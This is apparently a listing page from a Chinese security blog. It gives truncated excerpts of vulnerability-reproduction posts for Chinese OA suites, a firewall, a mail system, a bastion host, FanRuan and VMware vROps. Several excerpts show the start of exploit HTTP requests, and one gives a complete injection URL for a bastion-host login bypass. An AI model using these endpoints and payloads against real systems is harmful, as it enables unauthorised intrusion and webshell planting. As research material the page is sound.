https://www.o2oxy.cn/wp-content/uploads/2021/05/Centos提权.zip sudo版本和系统版本 [liang@iZwz91151k3ad6caoozz05Z ~]$ [liang@iZwz91151k3ad6caoozz05Z ~]$ sudo -V ...
漏洞复现
密码保护:某凌OA 前台未授权getshell
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...
网康NS-NGFW防火墙远程RCE 漏洞复现
漏洞点在 /directdata/direct/router 具体包如下: POST /directdata/direct/router HTTP/1.1 Host: 192.168.10.6 Connection: close Cache-Control: max-age=0 sec-ch-ua: "Google...
亿邮电子邮件系统存在远程命令执行漏洞 漏洞复现
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 Host: 192.168.10.1 Content-Length: 25 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML...
某治堡垒机任意用户登录
HTTP://x.x.x.x/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm 状态码返回200,存在漏洞;“错误...
致远OA 前台getshell 复现
首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的 POST /seeyon/thirdpartyController.do HTTP/1.1 Host: 192.168.10.2 User-Agent: python-requests/2.25....
用友 GRP-u8 SQL注入 漏洞复现
POST /Proxy HTTP/1.1 Host: 192.168.10.2:8025 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.1...
帆软 V9 getshell
注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat 启动帆软后默认存在的 JSP 文件: POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&fi...
dzzoffice 前台RCE复现
一、环境安装 源代码: https://github.com/zyx0814/dzzoffice/releases/ 二、利用前提 首先需要获取到authkey 这个可以通过爆破或者其他的方式获取到具体的这...
VMware vRealize Operations Manager SSRF CVE-2021-21975漏洞复现
下载ova https://my.vmware.com/group/vmware/patch#search 下载完之后双击。然后导入虚拟机 然后进行访问 设置好密码然后设置为新环境 ...